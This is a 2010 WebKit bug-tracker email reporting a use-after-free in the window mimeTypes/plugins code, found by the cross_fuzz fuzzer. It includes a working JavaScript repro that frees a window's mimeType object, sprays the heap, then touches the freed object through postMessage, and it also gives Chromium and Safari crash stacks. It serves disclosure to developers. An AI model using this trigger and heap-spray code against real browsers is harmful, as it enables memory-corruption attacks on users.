[Webkit-unassigned] [Bug 43297] New: cross_fuzz "plugins" window reload memory corruption
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Sat Jul 31 04:13:26 PDT 2010
https://bugs.webkit.org/show_bug.cgi?id=43297
Summary: cross_fuzz "plugins" window reload memory corruption
Product: WebKit
Version: 528+ (Nightly build)
Platform: PC
OS/Version: Windows Vista
Status: NEW
Severity: Major
Priority: P1
Component: HTML DOM
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: skylined at chromium.org
CC: eric at webkit.org
Blocks: 42959
Created an attachment (id=63148)
--> (https://bugs.webkit.org/attachment.cgi?id=63148)
Repro
This bug is similar to bug 43295 and 31886 in that it is also a use-after-free bug triggered by getting a certain property of a window object and reloading/closing the window before using the property.
<script>
var target_window, mimeType;
function step1() {
console.log('step1');
target_window = window.open("");
mimeType = target_window.clientInformation.mimeTypes[0];
console.log('step2');
target_window.close();
setTimeout(step2, 100);
}
function step2() {
heap_corrupt();
try {target_window.postMessage(mimeType); } catch(e) {}
console.log('reload');
location.reload();
}
function heap_corrupt() {
console.log('heap corrupted');
var a = [];
for(var si = 0; si < 0x100; si++) {
try { a.push(new WebGLByteArray(si)) } catch (e) {}
a.push(new Array(si).join('A'));
}
for (var li = 0x200; li < 0x10000; li <<= 1) {
try { a.push(new WebGLByteArray(li)); } catch (e) {}
a.push(new Array(li).join('A'));
}
delete a;
gc();
}
step1();
</script>
Stacks vary, as the use-after-free can lead to unpredictable behavior. A common stack in Chromium is:
stack: WebCore::SubframeLoader::allowPlugins
WebCore::DOMMimeType::enabledPlugin
WebCore::DOMMimeTypeInternal::enabledPluginAttrGetter
v8::internal::Object::GetPropertyWithCallback
v8::internal::Object::GetProperty
v8::internal::Object::GetPropertyWithReceiver
v8::internal::Runtime::GetObjectProperty
v8::internal::GetProperty
...
Safari gave me this:
stack: WebCore::MimeType::enabledPlugin
WebCore::jsMimeTypeEnabledPlugin
JSC::PropertySlot::getValue
WebCore::SerializingTreeWalker::getProperty
WebCore::walk<...>
WebCore::SerializedScriptValueData::serialize
WebCore::JSDOMWindow::postMessage
WebCore::jsDOMWindowPrototypeFunctionPostMessage
...
This affects Safari 5, WebKit Nightly, Chrome 5 and Chromium latest and probably everything using WebKit.
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list